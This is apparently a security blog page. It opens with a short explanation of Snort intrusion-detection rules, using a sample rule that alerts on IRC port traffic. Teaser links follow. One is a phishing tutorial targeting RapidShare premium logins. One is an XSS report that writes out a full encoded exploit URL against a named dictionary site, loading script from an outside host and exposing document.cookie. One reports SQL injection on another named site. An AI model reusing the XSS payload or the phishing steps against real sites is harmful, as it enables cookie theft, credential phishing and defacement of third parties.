Snort rules are the conditions specified by a Network Administrator that differentiate between normal Internet activities and malicious activities. Snort rules are made up of two basic parts:

* Rule header: This is the part of any rule where the rule’s actions are identified. Alert, Log, Pass, Activate, Dynamic, etc. are some important actions used in snort rules.
* Rule options: This is the part of any rule where the rule’s alert messages are identified.

For example: A Network Administrator has written the following rule:

Alert tcp any -> any 6667 (msg:”IRC port in use”; flow:from_client)

The first portion of the rule specifies the action, which is to examine port 6667 traffic. If a match occurs, a message should be generated that reads “IRC port is in use”, and the IDS would create a record that an IRC port might have been accessed.

Explore More

phishing tutorial

1.You can use this same tut for anything else… 2. Go to http://www.rapidshare.com and navigate to the premium account log-in screen at the url : https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi 3. We will now

Read More

critical XSS Vulnerability on Ayar Myanmar-English Dictionary

PlanetCreator has reported another critical XSS Vulnerability on Ayar Myanmar – English Dictionary Website :    Owned by Ayar Myanmar Unicode Group. Test XSS : http://myanmardictionary.co.cc/feedback.php?page=1&q=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E This vulnerability has been alerted

Read More

Critical SQL Injection in singforyou.net

Security Researcher $@T0R! has reported another Critical SQL Injection in singforyou.net SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an

Read More